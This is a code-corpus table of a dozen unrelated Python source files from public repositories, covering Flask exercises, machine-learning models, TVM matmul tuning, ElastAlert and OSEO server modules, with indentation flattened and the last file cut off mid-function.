max_stars_repo_path | max_stars_repo_name | max_stars_count | id | content
---|---|---|---|---
Nelson_Alvarez/Assignments/flask_fund/ninja_turtle/turtle.py | webguru001/Python-Django-Web | 5 | 10800 |
from flask import Flask
from flask import render_template, redirect, session, request
app = Flask(__name__)
app.secret_key = 'ThisIsSecret'
@app.route('/')
def nothing():
return render_template('index.html')
@app.route('/ninja')
def ninja():
x = 'tmnt'
return render_template('ninjas.html', x=x)
@app.route('/ninja/<any>')
def ninjas_colors_any(any):
ninja_dict = {'blue': 'leonardo', 'red': 'raphael', 'purple': 'donatello', 'orange': 'michelangelo'}
if any in ninja_dict:
x = ninja_dict[any]
return render_template('ninjas.html', x=x)
else:
x = 'notapril'
return render_template('ninjas.html', x=x)
app.run(debug=True)
neo/Network/Inventory.py | BSathvik/neo-python | 15 | 10801 |
# -*- coding:utf-8 -*-
"""
Description:
Inventory Class
Usage:
from neo.Network.Inventory import Inventory
"""
from neo.IO.MemoryStream import MemoryStream
from neocore.IO.BinaryWriter import BinaryWriter
class Inventory(object):
"""docstring for Inventory"""
def __init__(self):
"""
Create an instance
"""
super(Inventory, self).__init__()
self.hash = None
def GetHashData(self):
"""
Get the hashable data.
Returns:
bytes:
"""
ms = MemoryStream()
w = BinaryWriter(ms)
self.SerializeUnsigned(w)
ms.flush()
return ms.ToArray()
def GetScriptHashesForVerifying(self):
pass
def Serialize(self, writer):
pass
def SerializeUnsigned(self, writer):
pass
def Deserialize(self, reader):
pass
def DeserializeUnsigned(self, reader):
pass
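# A minimal usage sketch: a concrete inventory type implements SerializeUnsigned(),
# and GetHashData() then yields the bytes that would be hashed. ExampleInventory and
# the WriteUInt32 call are illustrative assumptions about neocore's BinaryWriter API.
if __name__ == "__main__":
    class ExampleInventory(Inventory):
        def __init__(self, value):
            super(ExampleInventory, self).__init__()
            self.value = value

        def SerializeUnsigned(self, writer):
            # assumes BinaryWriter exposes WriteUInt32; any Write* method would do
            writer.WriteUInt32(self.value)

    print(ExampleInventory(7).GetHashData())  # raw bytes of the unsigned serialization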
tests/test_api_gateway/test_common/test_exceptions.py | Clariteia/api_gateway_common | 3 | 10802 |
"""
Copyright (C) 2021 Clariteia SL
This file is part of minos framework.
Minos framework can not be copied and/or distributed without the express permission of Clariteia SL.
"""
import unittest
from minos.api_gateway.common import (
EmptyMinosModelSequenceException,
MinosAttributeValidationException,
MinosConfigDefaultAlreadySetException,
MinosConfigException,
MinosException,
MinosMalformedAttributeException,
MinosModelAttributeException,
MinosModelException,
MinosParseAttributeException,
MinosRepositoryAggregateNotFoundException,
MinosRepositoryDeletedAggregateException,
MinosRepositoryException,
MinosRepositoryManuallySetAggregateIdException,
MinosRepositoryManuallySetAggregateVersionException,
MinosRepositoryNonProvidedException,
MinosRepositoryUnknownActionException,
MinosReqAttributeException,
MinosTypeAttributeException,
MultiTypeMinosModelSequenceException,
)
class TestExceptions(unittest.TestCase):
def test_type(self):
self.assertTrue(issubclass(MinosException, Exception))
def test_base_repr(self):
exception = MinosException("test")
self.assertEqual("MinosException(message='test')", repr(exception))
def test_base_str(self):
exception = MinosException("test")
self.assertEqual("test", str(exception))
def test_config(self):
self.assertTrue(issubclass(MinosConfigException, MinosException))
def test_config_default_already_set(self):
self.assertTrue(issubclass(MinosConfigDefaultAlreadySetException, MinosConfigException))
def test_repository_aggregate_not_found(self):
self.assertTrue(issubclass(MinosRepositoryAggregateNotFoundException, MinosRepositoryException))
def test_repository_deleted_aggregate(self):
self.assertTrue(issubclass(MinosRepositoryDeletedAggregateException, MinosRepositoryException))
def test_repository_manually_set_aggregate_id(self):
self.assertTrue(issubclass(MinosRepositoryManuallySetAggregateIdException, MinosRepositoryException))
def test_repository_manually_set_aggregate_version(self):
self.assertTrue(issubclass(MinosRepositoryManuallySetAggregateVersionException, MinosRepositoryException,))
def test_repository_bad_action(self):
self.assertTrue(issubclass(MinosRepositoryUnknownActionException, MinosRepositoryException))
def test_repository_non_set(self):
self.assertTrue(issubclass(MinosRepositoryNonProvidedException, MinosRepositoryException))
def test_model(self):
self.assertTrue(issubclass(MinosModelException, MinosException))
def test_model_emtpy_sequence(self):
self.assertTrue(issubclass(EmptyMinosModelSequenceException, MinosModelException))
def test_model_multi_type_sequence(self):
self.assertTrue(issubclass(MultiTypeMinosModelSequenceException, MinosModelException))
def test_model_attribute(self):
self.assertTrue(issubclass(MinosModelAttributeException, MinosException))
def test_required_attribute(self):
self.assertTrue(issubclass(MinosReqAttributeException, MinosModelAttributeException))
def test_type_attribute(self):
self.assertTrue(issubclass(MinosTypeAttributeException, MinosModelAttributeException))
def test_type_attribute_repr(self):
exception = MinosTypeAttributeException("foo", float, True)
message = (
"MinosTypeAttributeException(message=\"The <class 'float'> expected type for 'foo' "
"does not match with the given data type: <class 'bool'>\")"
)
self.assertEqual(message, repr(exception))
def test_malformed_attribute(self):
self.assertTrue(issubclass(MinosMalformedAttributeException, MinosModelAttributeException))
def test_parse_attribute(self):
self.assertTrue(issubclass(MinosParseAttributeException, MinosModelAttributeException))
def test_attribute_parse_repr(self):
exception = MinosParseAttributeException("foo", 34, ValueError())
message = (
'MinosParseAttributeException(message="ValueError() '
"was raised while parsing 'foo' field with 34 value.\")"
)
self.assertEqual(message, repr(exception))
def test_attribute_validation(self):
self.assertTrue(issubclass(MinosAttributeValidationException, MinosModelAttributeException))
def test_attribute_validation_repr(self):
exception = MinosAttributeValidationException("foo", 34)
message = "MinosAttributeValidationException(message=\"34 value does not pass the 'foo' field validation.\")"
self.assertEqual(message, repr(exception))
if __name__ == "__main__":
unittest.main()
native_prophet.py | 1143048123/cddh | 177 | 10803 |
# coding: utf-8
# quote from kmaiya/HQAutomator
# The Google-search part is carried over from the original project, unmodified
import time
import json
import requests
import webbrowser
questions = []
def get_answer():
resp = requests.get('http://htpmsg.jiecaojingxuan.com/msg/current',timeout=4).text
resp_dict = json.loads(resp)
if resp_dict['msg'] == 'no data':
return 'Waiting for question...'
else:
# resp_dict already holds the parsed JSON; no need to re-parse the response with eval()
question = resp_dict['data']['event']['desc']
question = question[question.find('.') + 1:question.find('?')]
if question not in questions:
questions.append(question)
webbrowser.open("https://www.baidu.com/s?ie=UTF-8&wd=" + question)
else:
return 'Waiting for new question...'
def main():
while True:
print(time.strftime('%H:%M:%S',time.localtime(time.time())))
print(get_answer())
time.sleep(1)
if __name__ == '__main__':
main()
python/ht/nodes/styles/styles.py | Hengle/Houdini-Toolbox | 136 | 10804 |
"""Classes representing color entries and mappings."""
# =============================================================================
# IMPORTS
# =============================================================================
from __future__ import annotations
# Standard Library
import re
from typing import TYPE_CHECKING, Optional, Tuple
if TYPE_CHECKING:
import hou
# =============================================================================
# CLASSES
# =============================================================================
class StyleConstant:
"""This class represents a named constant style.
:param name: The constant's name.
:param color: The constant's color.
:param color_type: The color type.
:param shape: The constant's shape.
:param file_path: The path to the definition file.
:return:
"""
def __init__(
self,
name: str,
color: hou.Color,
color_type: str,
shape: Optional[str] = None,
file_path: Optional[str] = None,
):
self._color = color
self._color_type = color_type
self._shape = shape
self._file_path = file_path
self._name = name
# -------------------------------------------------------------------------
# SPECIAL METHODS
# -------------------------------------------------------------------------
def __eq__(self, other):
if not isinstance(other, StyleConstant):
return NotImplemented
# For our purposes we only care if the names match.
return self.name == other.name
def __hash__(self):
return hash(self.name)
def __ne__(self, other):
if not isinstance(other, StyleConstant):
return NotImplemented
return not self.__eq__(other)
def __repr__(self):
return "<StyleConstant {} ({})>".format(self.name, self.color)
# -------------------------------------------------------------------------
# PROPERTIES
# -------------------------------------------------------------------------
@property
def color(self) -> hou.Color:
"""The mapped color."""
return self._color
# -------------------------------------------------------------------------
@property
def color_type(self) -> str:
"""The mapped color type."""
return self._color_type
# -------------------------------------------------------------------------
@property
def file_path(self) -> Optional[str]:
"""Path the definition was from."""
return self._file_path
# -------------------------------------------------------------------------
@property
def name(self) -> str:
"""The name the color is mapped to."""
return self._name
# -------------------------------------------------------------------------
@property
def shape(self) -> Optional[str]:
"""The mapped shape."""
return self._shape
# -------------------------------------------------------------------------
# METHODS
# -------------------------------------------------------------------------
def apply_to_node(self, node: hou.Node):
"""Apply styling to a node.
:param node: Node to apply to
:return:
"""
if self.color is not None:
node.setColor(self.color)
if self.shape is not None:
node.setUserData("nodeshape", self.shape)
class StyleRule:
"""This class represents a color application bound to a name.
:param name: The rule's name.
:param color: The rule's color.
:param color_type: The rule's color type.
:param shape: The rule's shape.
:param file_path: The path to the definition file.
:return:
"""
def __init__(
self,
name: str,
color: hou.Color,
color_type: str,
shape: Optional[str] = None,
file_path: Optional[str] = None,
):
self._color = color
self._color_type = color_type
self._shape = shape
self._file_path = file_path
self._name = name
# -------------------------------------------------------------------------
# SPECIAL METHODS
# -------------------------------------------------------------------------
def __eq__(self, other):
if not isinstance(other, StyleRule):
return NotImplemented
# For our purposes we only care if the names match.
return self.name == other.name
def __hash__(self):
return hash(self.name)
def __ne__(self, other):
if not isinstance(other, StyleRule):
return NotImplemented
return not self.__eq__(other)
def __repr__(self):
return "<StyleRule {} ({})>".format(self.name, self.color)
def __str__(self):
value = self._get_typed_color_value()
components = [re.sub("\\.*0+$", "", "{:0.3f}".format(val)) for val in value]
return "(" + ", ".join(components) + ")"
# -------------------------------------------------------------------------
# NON-PUBLIC METHODS
# -------------------------------------------------------------------------
def _get_typed_color_value(self) -> Tuple[float]:
"""Get the appropriately typed color values.
:return: The color value in the correct type.
"""
to_func = getattr(self.color, self.color_type.lower())
return to_func()
# -------------------------------------------------------------------------
# PROPERTIES
# -------------------------------------------------------------------------
@property
def color(self) -> hou.Color:
"""The mapped color."""
return self._color
@property
def color_type(self) -> str:
"""The mapped color type."""
return self._color_type
@property
def shape(self) -> Optional[str]:
"""The mapped shape name."""
return self._shape
@property
def file_path(self) -> Optional[str]:
"""Path the definition was from."""
return self._file_path
@property
def name(self) -> str:
"""The name the style is mapped to."""
return self._name
# -------------------------------------------------------------------------
# METHODS
# -------------------------------------------------------------------------
def apply_to_node(self, node: hou.Node):
"""Apply styling to a node.
:param node: Node to apply to
:return:
"""
if self.color is not None:
node.setColor(self.color)
if self.shape is not None:
node.setUserData("nodeshape", self.shape)
class ConstantRule:
"""This class represents a style application bound to a named constant.
:param name: The rule's name.
:param constant_name: The constant name.
:param file_path: The path to the definition file.
:return:
"""
def __init__(self, name: str, constant_name: str, file_path: Optional[str] = None):
self._constant_name = constant_name
self._file_path = file_path
self._name = name
# -------------------------------------------------------------------------
# SPECIAL METHODS
# -------------------------------------------------------------------------
def __eq__(self, other):
if not isinstance(other, ConstantRule):
return NotImplemented
# For our purposes we only care if the names match.
return self.name == other.name
def __hash__(self):
return hash((self.constant_name, self.name))
def __ne__(self, other):
if not isinstance(other, ConstantRule):
return NotImplemented
return not self.__eq__(other)
def __repr__(self):
return "<ConstantRule {} ({})>".format(self.name, self.constant_name)
# -------------------------------------------------------------------------
# PROPERTIES
# -------------------------------------------------------------------------
@property
def constant_name(self) -> str:
"""The mapped constant."""
return self._constant_name
@property
def file_path(self) -> Optional[str]:
"""Path the definition was from."""
return self._file_path
@property
def name(self) -> str:
"""The name the style is mapped to."""
return self._name
src/sntk/kernels/ntk.py | gear/s-ntk | 0 | 10805 |
import math
import numpy as np
# return an array K of size (d_max, d_max, N, N), K[i][j] is kernel value of depth i + 1 with first j layers fixed
def kernel_value_batch(X, d_max):
K = np.zeros((d_max, d_max, X.shape[0], X.shape[0]))
for fix_dep in range(d_max):
S = np.matmul(X, X.T)
H = np.zeros_like(S)
for dep in range(d_max):
if fix_dep <= dep:
H += S
K[dep][fix_dep] = H
L = np.diag(S)
P = np.clip(np.sqrt(np.outer(L, L)), a_min = 1e-9, a_max = None)
Sn = np.clip(S / P, a_min = -1, a_max = 1)
S = (Sn * (math.pi - np.arccos(Sn)) + np.sqrt(1.0 - Sn * Sn)) * P / 2.0 / math.pi
H = H * (math.pi - np.arccos(Sn)) / 2.0 / math.pi
return K
# return an array K of size (N, N), depth d_max, first fix_dep layers fixed
def kernel_value(X, d_max, fix_dep):
K = np.zeros((d_max, X.shape[0], X.shape[0]))
S = np.matmul(X, X.T)
H = np.zeros_like(S)
for dep in range(d_max):
if fix_dep <= dep:
H += S
K[dep] = H
L = np.diag(S)
P = np.clip(np.sqrt(np.outer(L, L)), a_min = 1e-9, a_max = None)
Sn = np.clip(S / P, a_min = -1, a_max = 1)
S = (Sn * (math.pi - np.arccos(Sn)) + np.sqrt(1.0 - Sn * Sn)) * P / 2.0 / math.pi
H = H * (math.pi - np.arccos(Sn)) / 2.0 / math.pi
return K[d_max - 1]
nlpproject/main/words.py | Hrishi2312/IR-reimagined | 0 | 10806 |
import nltk
from nltk.corpus import stopwords
from nltk.stem import WordNetLemmatizer, PorterStemmer
from nltk.tokenize import sent_tokenize , word_tokenize
import glob
import re
import os
import numpy as np
import sys
nltk.download('stopwords')
nltk.download('punkt')
Stopwords = set(stopwords.words('english'))
all_words = []
dict_global = {}
file_folder = 'main/documents/*'
idx = 1
files_with_index = {}
def finding_all_unique_words_and_freq(words):
words_unique = []
word_freq = {}
for word in words:
if word not in words_unique:
words_unique.append(word)
for word in words_unique:
word_freq[word] = words.count(word)
return word_freq
def finding_freq_of_word_in_doc(word,words):
freq = words.count(word)
return freq
def remove_special_characters(text):
regex = re.compile(r'[^a-zA-Z0-9\s]')
text_returned = re.sub(regex,'',text)
return text_returned
for file in glob.glob(file_folder):
fname = file
file = open(file , "r")
text = file.read()
text = remove_special_characters(text)
text = re.sub(re.compile(r'\d'), '', text)
sentences = sent_tokenize(text)
words = word_tokenize(text)
words = [word for word in words if len(word) > 1]
words = [word.lower() for word in words]
words = [word for word in words if word not in Stopwords]
dict_global.update(finding_all_unique_words_and_freq(words))
files_with_index[idx] = os.path.basename(fname)
idx = idx + 1
unique_words_all = set(dict_global.keys())
oseoserver/operations/describeresultaccess.py | pyoseo/oseoserver | 0 | 10807 |
# Copyright 2017 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Implements the OSEO DescribeResultAccess operation"""
from __future__ import absolute_import
import logging
import datetime as dt
from django.core.exceptions import ObjectDoesNotExist
import pytz
import pyxb
import pyxb.bundles.opengis.oseo_1_0 as oseo
from .. import errors
from .. import models
from ..models import Order
from .. import utilities
logger = logging.getLogger(__name__)
def describe_result_access(request, user):
"""Implements the OSEO DescribeResultAccess operation.
This operation returns the location of the order items that are
ready to be downloaded by the user.
The DescribeResultAccess operation only reports on the availability
of order items that specify onlineDataAccess as their delivery option.
Parameters
----------
request: oseo.DescribeResultAccess
The incoming request
user: django.contrib.auth.User
The django user that placed the request
Returns
-------
response: oseo.SubmitAck
The response SubmitAck instance
"""
try:
order = Order.objects.get(id=request.orderId)
except ObjectDoesNotExist:
raise errors.InvalidOrderIdentifierError()
if order.user != user:
raise errors.AuthorizationFailedError
completed_items = get_order_completed_items(order, request.subFunction)
logger.debug("completed_items: {}".format(completed_items))
order.last_describe_result_access_request = dt.datetime.now(pytz.utc)
order.save()
response = oseo.DescribeResultAccessResponse(status='success')
item_id = None
for item in completed_items:
iut = oseo.ItemURLType()
iut.itemId = item_id or item.item_specification.item_id
iut.productId = oseo.ProductIdType(
identifier=item.identifier,
)
iut.productId.collectionId = utilities.get_collection_identifier(
item.item_specification.collection)
iut.itemAddress = oseo.OnLineAccessAddressType()
iut.itemAddress.ResourceAddress = pyxb.BIND()
iut.itemAddress.ResourceAddress.URL = item.url
iut.expirationDate = item.expires_on
response.URLs.append(iut)
return response
def get_order_completed_items(order, behaviour):
"""Get the completed order items for product orders.
Parameters
----------
order: oseoserver.models.Order
The order for which completed items are to be returned
behaviour: str
Either 'allReady' or 'nextReady', as defined in the OSEO
specification
Returns
--------
list
The completed order items for this order
"""
batches = order.batches.all()
all_complete = []
for batch in batches:
complete_items = get_batch_completed_items(batch, behaviour)
all_complete.extend(complete_items)
return all_complete
def get_batch_completed_items(batch, behaviour):
last_time = batch.order.last_describe_result_access_request
list_all_items = last_time is None or behaviour == batch.ALL_READY
order_delivery = batch.order.selected_delivery_option.delivery_type
batch_complete_items = []
queryset = batch.order_items.filter(
status=batch.order.COMPLETED
).order_by("item_specification__id")
for item in queryset:
item_spec = item.item_specification
try:
delivery = (
item_spec.selected_delivery_option.delivery_type)
except models.ItemSpecificationDeliveryOption.DoesNotExist:
delivery = order_delivery
if delivery != models.BaseDeliveryOption.ONLINE_DATA_ACCESS:
# describeResultAccess only applies to items that specify
# 'onlinedataaccess' as delivery type
logger.debug(
"item {} does not specify onlinedataaccess as its "
"delivery type, skipping item...".format(item)
)
continue
completed_since_last = (item.completed_on is None or
last_time is None or
item.completed_on >= last_time)
list_this_item = (
behaviour == batch.NEXT_READY and completed_since_last)
if list_all_items or list_this_item:
batch_complete_items.append(item)
return batch_complete_items
utils/decorator/dasyncio.py | masonsxu/red-flask | 0 | 10808 |
# -*- coding: utf-8 -*-
# Async function decorators built on top of Python's threading module
import time
from functools import wraps
from threading import Thread
def async_call(fn):
"""一次简单的异步处理操作,装饰在要异步执行的函数前,再调用该函数即可执行单次异步操作(开辟一条新的线程)
Args:
:fn(function):需要异步处理的方法
Return:
:wrapper(function):
"""
@wraps(fn)  # preserve the wrapped function's name and metadata instead of the decorator's
def wrapper(*args, **kwargs):
Thread(target=fn, args=args, kwargs=kwargs).start()
return wrapper
def async_pool(pool_links):
"""可定义链接数的线程池装饰器,可用于并发执行多次任务
Args:
:pool_links(int):进程的数量
Returns:
:sub_wrapper(function):对象装饰器
"""
def sub_wrapper(func):
@wraps(func)
def wrapper(*args, **kwargs):
for _ in range(0, pool_links):
Thread(target=func, args=args, kwargs=kwargs).start()
# func(*args, **kwargs)
return wrapper
return sub_wrapper
def async_retry(retry_times, space_time):
"""自动重试类装饰器,不支持单独异步,但可嵌套于 call 和 pool中使用
Args:
:retry_times(int):重试次数
"""
def sub_wrapper(func):
@wraps(func)
def wrapper(*args, **kwargs):
try_times = retry_times
while try_times > 0:
try:
func(*args, **kwargs)
break
except Exception as e:
print(e)
time.sleep(space_time)
try_times = try_times - 1
return wrapper
return sub_wrapper
# Commented-out test/example code below
# @async_call
# def sleep2andprint():
# time.sleep(2)
# print('22222222')
# @async_pool(pool_links=5)
# def pools():
# time.sleep(1)
# print('hehe')
# @async_retry(retry_times=3, space_time=1)
# def check():
# a = 1
# b = '2'
# print(a + b)
# def check_all():
# print('Testing the async_call component')
# print('111111')
# sleep2andprint()
# print('333333')
# print('If 333333 appears before 222222, the async call worked')
# print('Testing the async_pool component')
# pools()
# print('Five "hehe" printed within one second means success')
# print('Testing the async_retry component')
# check()
# print('The exception printed three times means success')
# print(check.__name__)
# print(sleep2andprint.__name__)
# print(pools.__name__)
# check_all()
oo/pessoa.py | wfs18/pythonbirds | 0 | 10809 |
class Person:
olhos = 2
def __init__(self, *children, name=None, year=0):
self.year = year
self.name = name
self.children = list(children)
def cumprimentar(self):
return 'Hello'
@staticmethod
def metodo_estatico():
return 123
@classmethod
def metodo_classe(cls):
return f'{cls} - {cls.olhos}'
if __name__ == '__main__':
p = Person()
eu = Person(name='marcio')
wes = Person(eu, name='Wesley')
print(p.cumprimentar())
print(p.year)  # instance attribute
print(p.name)  # data attribute
for filhos in wes.children:
print(filhos.year)
p.sobre = 'eu'
print(p.sobre)
del p.sobre
print(p.__dict__)
print(p.olhos)
print(eu.olhos)
print(p.metodo_estatico(), eu.metodo_estatico())
print(p.metodo_classe(), eu.metodo_classe())
tests/integration/test_combined.py | jonathan-winn-geo/new-repo-example | 0 | 10810 |
"""Test combined function."""
from cmatools.combine.combine import combined
def test_combined():
"""Test of combined function"""
assert combined() == "this hello cma"
elastalert_modules/top_count_keys_enhancement.py | OpenCoreCH/elastalert | 0 | 10811 |
"""Enhancement to reformat `top_events_X`
from match in order to reformat and put it
back to be able to use in alert message.
New format:
top_events_keys_XXX -- contains array of corresponding key values defined in `top_count_keys`,
where `XXX` key from `top_count_keys` array.
top_events_values_XXX -- contains array of corresponding counts.
Example:
Original:
{"top_events_KEY.NAME":{"key_value1": 10, "key_value2": 20}}
Reformatted:
{
"top_events_keys_KEY.NAME":["key_value1", "key_value2"]
"top_events_values_KEY.NAME":[10, 20]
}
Can be used in the rule like:
top_count_keys:
- 'KEY.NAME'
match_enhancements:
- 'elastalert_modules.top_count_keys_enhancement.Enhancement'
alert_text_args:
- top_events_keys_KEY.NAME[0]
"""
from elastalert.enhancements import BaseEnhancement
class Enhancement(BaseEnhancement):
def process(self, match):
top_count_keys = self.rule['top_count_keys']
if top_count_keys:
for k in top_count_keys:
key = "top_events_%s" % k
if match[key]:
filtered = {key: value for (key, value) in match[key].items() if key}
match["top_events_keys_%s" % k] = list(filtered.keys())
match["top_events_values_%s" % k] = list(filtered.values())
nets.py | koreyou/SWEM-chainer | 0 | 10812 |
import numpy
import chainer
import chainer.functions as F
import chainer.links as L
from chainer import reporter
embed_init = chainer.initializers.Uniform(.25)
def block_embed(embed, x, dropout=0.):
"""Embedding function followed by convolution
Args:
embed (callable): A :func:`~chainer.functions.embed_id` function
or :class:`~chainer.links.EmbedID` link.
x (:class:`~chainer.Variable` or :class:`numpy.ndarray` or \
:class:`cupy.ndarray`): Input variable, which
is a :math:`(B, L)`-shaped int array. Its first dimension
:math:`(B)` is assumed to be the *minibatch dimension*.
The second dimension :math:`(L)` is the length of padded
sentences.
dropout (float): Dropout ratio.
Returns:
~chainer.Variable: Output variable. A float array with shape
of :math:`(B, N, L, 1)`. :math:`(N)` is the number of dimensions
of word embedding.
"""
e = embed(x)
e = F.dropout(e, ratio=dropout)
e = F.transpose(e, (0, 2, 1))
e = e[:, :, :, None]
return e
class SWEMBase(chainer.Chain):
"""The base class for SWEM (Simple Word-Embedding-based Models)
This model embed tokens to word embedding, encode embedding to
with pooling (which needs to be implemented in derived classes)
and applies two layer MLP.
Args:
n_class (int): The number of classes to be predicted.
n_vocab (int): The size of vocabulary.
emb_size (int): The number of units word embedding.
n_units (int): The number of units of MLP.
dropout (float): The dropout ratio.
"""
def __init__(self, n_class, n_vocab, emb_size, n_units,
dropout=0.2, initial_emb=None):
super(SWEMBase, self).__init__()
if initial_emb is None:
initial_emb = embed_init
with self.init_scope():
self.embed = L.EmbedID(
n_vocab, emb_size, ignore_label=-1, initialW=initial_emb)
self.l1 = L.Linear(None, n_units)
self.l2 = L.Linear(n_units, n_class)
self.dropout = dropout
def forward(self, xs):
return self.predict(xs)
def predict(self, xs, softmax=False, argmax=False):
x_block = chainer.dataset.convert.concat_examples(xs, padding=-1)
ex_block = block_embed(self.embed, x_block, self.dropout)
x_len = [len(x) for x in xs]
z = self.encode(ex_block, x_len)
h = F.relu(self.l1(F.dropout(z, self.dropout)))
logits = self.l2(F.dropout(h, self.dropout))
if softmax:
return F.softmax(logits).array
elif argmax:
return self.xp.argmax(logits.array, axis=1)
else:
return logits
def encode(self, ex_block, x_len):
raise NotImplementedError()
class SWEMhier(SWEMBase):
"""Hierarchical variation of SWEM (SWEM-hier)
Args:
n_class (int): The number of classes to be predicted.
n_vocab (int): The size of vocabulary.
emb_size (int): The number of units word embedding.
n_units (int): The number of units of MLP.
dropout (float): The dropout ratio.
"""
def __init__(self, n_class, n_vocab, emb_size, n_units,
dropout=0.2, initial_emb=None, window=5):
super(SWEMhier, self).__init__(
n_class, n_vocab, emb_size, n_units, dropout=dropout,
initial_emb=initial_emb)
self.window = window
def encode(self, ex_block, x_len):
if ex_block.shape[2] > self.window:
# no need for pooling when length is smaller than the window
ex_block = F.average_pooling_2d(ex_block, [self.window, 1], stride=1)
return F.max(F.squeeze(ex_block, -1), axis=2)
class SWEMconcat(SWEMBase):
def encode(self, ex_block, x_len):
emb_ave = F.sum(F.squeeze(ex_block, -1), axis=2) / self.xp.array(x_len)[:, None]
emb_max = F.max(F.squeeze(ex_block, -1), axis=2)
return F.concat((emb_max, emb_ave), axis=1)
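# A minimal sketch of what block_embed() produces; the vocabulary size, embedding
# size and token ids below are made-up illustration values.
if __name__ == "__main__":
    embed = L.EmbedID(10, 8, ignore_label=-1)
    x = numpy.array([[1, 2, 3], [4, 5, -1]], dtype=numpy.int32)  # -1 marks padding
    e = block_embed(embed, x)
    print(e.shape)  # (2, 8, 3, 1): batch, embedding dim, padded length, 1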
src/entities/users.py | MillaKelhu/ohtu-lukuvinkkikirjasto | 0 | 10813 |
from flask_login import UserMixin
class Users(UserMixin):
# Create a mock in-memory "database" of users
user_database = {"kayttaja": ("kayttaja", "salasana"),
"tunnus": ("tunnus", "passu")}
def __init__(self, id, username, password):
self.id = id
self.username = username
self.password = password
def get_username(self):  # NOTE: shadowed by the classmethod get_username defined below
return self.username
@classmethod
def get_password(cls, username):
username, password = cls.user_database.get(username)
return password
@classmethod
def get_username(cls, username):
username, password = cls.user_database.get(username)
return username
def is_active(self):
return True
def get_id(self):
return self.id
def roles(self):
return ["ADMIN", "USER"]
@classmethod
def get(cls, id):
return cls.user_database.get(id)
artifacts/kernel_db/autotvm_scripts/tune_tilling_dense_select_codegen.py | LittleQili/nnfusion | 0 | 10814 |
"""
matmul autotvm
[batch,in_dim] x [in_dim,out_dim]
search_matmul_config(batch,in_dim,out_dim,num_trials):
input: batch,in_dim,out_dim,num_trials
[batch,in_dim] x [in_dim,out_dim]
num_trials: num of trials, default: 1000
output: log (json format)
use autotvm to search configs for the matmul
lookup_matmul_config():
find a proper matmul config
note: trade off kernel's performance and grid & block size
launch_matmul_from_config(config):
input: config (json string)
usage:
1. use search_matmul_config(batch,in_dim,out_dim,num_trials) to search configs
2. use lookup_matmul_config() to get a proper config
3. write the config (in json format) to "matmul_config.json"
4. use launch_matmul_from_config("matmul_config.json") to print the matmul kernel code
"""
import numpy as np
import tvm
import logging
import sys
from tvm import autotvm
import topi
import json
import os
from topi.util import get_const_tuple
import tensorflow as tf
flags = tf.flags
flags.DEFINE_string("input_path", "", "path of input file")
flags.DEFINE_string("autotvm_log", "../autotvm_logs/all_tuned_tilling_dense_nn.1000.log", "path of autotvm tuning log")
flags.DEFINE_string("tvm_profile_log",
"/tmp/tvm_profile.log", "path of tvm profile")
flags.DEFINE_string("output_path", "", "path of output file")
FLAGS = flags.FLAGS
@autotvm.template
def tvm_matmul_tune_op(batch, in_dim, out_dim):
"""
autotvm tuning template
D=A*B
[batch, in_dim] x [in_dim, out_dim]
"""
A = tvm.placeholder((batch, in_dim), name='A', dtype="float32")
B = tvm.placeholder((in_dim, out_dim), name='B', dtype="float32")
k = tvm.reduce_axis((0, in_dim), name='k')
C = tvm.compute((batch, out_dim), lambda i, j: tvm.sum(
A[i, k] * B[k, j], axis=k), name='C')
cfg = autotvm.get_config()
s = tvm.create_schedule(C.op)
AA = s.cache_read(A, "shared", [C])
AL = s.cache_read(AA, "local", [C])
BB = s.cache_read(B, "shared", [C])
BL = s.cache_read(BB, "local", [C])
CC = s.cache_write(C, "local")
y, x = C.op.axis
k = CC.op.reduce_axis[0]
cfg.define_split('tile_k', cfg.axis(k), num_outputs=3)
ko, kt, ki = cfg['tile_k'].apply(s, CC, k)
block_x = tvm.thread_axis('blockIdx.x')
block_y = tvm.thread_axis('blockIdx.y')
thread_x = tvm.thread_axis('threadIdx.x')
thread_y = tvm.thread_axis('threadIdx.y')
cfg.define_split('tile_y', cfg.axis(y), num_outputs=4)
cfg.define_split('tile_x', cfg.axis(x), num_outputs=4)
by, tyz, ty, yi = cfg['tile_y'].apply(s, C, y)
bx, txz, tx, xi = cfg['tile_x'].apply(s, C, x)
s[C].bind(by, block_y)
s[C].bind(bx, block_x)
s[C].bind(tyz, tvm.thread_axis('vthread'))
s[C].bind(txz, tvm.thread_axis('vthread'))
s[C].bind(ty, thread_y)
s[C].bind(tx, thread_x)
s[C].reorder(by, bx, tyz, txz, ty, tx, yi, xi)
s[CC].compute_at(s[C], tx)
yo, xo = CC.op.axis
s[CC].reorder(ko, kt, yo, xo, ki)
s[CC].unroll(kt)
for stage in [AL, BL]:
s[stage].compute_at(s[CC], kt)
s[stage].double_buffer()
for stage in [AA, BB]:
s[stage].compute_at(s[CC], ko)
fused = s[stage].fuse(*s[stage].op.axis)
ty, tx = s[stage].split(fused, nparts=cfg['tile_y'].size[2])
tx, xi = s[stage].split(tx, nparts=cfg['tile_x'].size[2])
_, xi = s[stage].split(xi, factor=4)
s[stage].bind(ty, thread_y)
s[stage].bind(tx, thread_x)
s[stage].vectorize(xi)
s[stage].double_buffer()
cfg.define_knob('auto_unroll_max_step', [512, 1500])
s[C].pragma(by, 'auto_unroll_max_step', cfg['auto_unroll_max_step'].val)
s[C].pragma(by, 'unroll_explicit', False)
cfg.add_flop(batch * in_dim * out_dim * 2)
return s, [A, B, C]
def search_matmul_config(batch, in_dim, out_dim, num_trials):
logging.getLogger('autotvm').setLevel(logging.DEBUG)
logging.getLogger('autotvm').addHandler(logging.StreamHandler(sys.stdout))
task = autotvm.task.create(tvm_matmul_tune_op, args=(
batch, in_dim, out_dim), target='cuda')
print(task.config_space)
measure_option = autotvm.measure_option(
builder=autotvm.LocalBuilder(),
runner=autotvm.LocalRunner(repeat=3, min_repeat_ms=100, timeout=4)
)
op_name = "tuned_dot_op_float_%d_%d_%d" % (batch, in_dim, out_dim)
log_name = "tuned_kernels/" + op_name + ".log"
tuner = autotvm.tuner.XGBTuner(task)
tuner.tune(n_trial=num_trials, measure_option=measure_option,
callbacks=[autotvm.callback.log_to_file(log_name)])
dispatch_context = autotvm.apply_history_best(log_name)
